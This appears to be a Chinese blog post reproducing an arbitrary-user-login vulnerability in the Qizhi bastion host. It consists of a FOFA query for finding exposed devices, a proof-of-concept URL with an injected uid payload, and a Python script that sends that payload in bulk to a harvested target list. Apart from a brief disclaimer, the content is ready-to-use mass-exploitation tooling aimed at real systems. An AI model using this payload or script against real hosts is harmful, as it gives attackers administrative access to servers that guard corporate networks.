齐治堡垒机任意用户登录漏洞

声明:仅供漏洞检测和学习,勿用于非法测试

漏洞信息

浙江齐治科技股份有限公司是一家主要经营计算机软硬件、网络产品的技术开发等项目的公司,近日,HW期间情报齐治运维堡垒机服务端存在任意用户登录系统漏洞,访问特定的Url即可获得后台权限。漏洞情报泄露时间:2021-04-10 23:03:05

fofa查询语法

app=“齐治科技-堡垒机”

POC

http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

批量检测脚本

可以先用fofa批量获取ip -》批量爬取fofa查询的目标ip地址

from requests.packages import urllib3
urllib3.disable_warnings()
import requests
from colorama import init
init(autoreset=True)
headers = {
			'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; PCRT00 Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36 fanwe_app_sdk sdk_type/android sdk_version_name/4.0.1 sdk_version/2020042901 screen_width/720 screen_height/1280',
		}

for url in open("./app=齐治科技-堡垒机.txt",'r'):
	#读取出来的数据默认加了换行符,这里要去掉
	url = url.strip("\n")
	vu_url = url + "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"
	try:
		re = requests.get(url=vu_url,headers=headers,verify=False,timeout=10,proxies={'https':'127.0.0.1:7890'})
		if "您尚未登录或者您的会话已超时,请 重新登录系统" in re.text:
			print(f"{url}漏洞不存在")
		elif "错误的id" in re.text:
			print(f"\033[0;32m{vu_url}漏洞存在\033[0m")
	except:
		print(f"{url}无响应")
print('ok')

 

你可能感兴趣的:(漏洞复现,齐治堡垒机任意用户登录漏洞)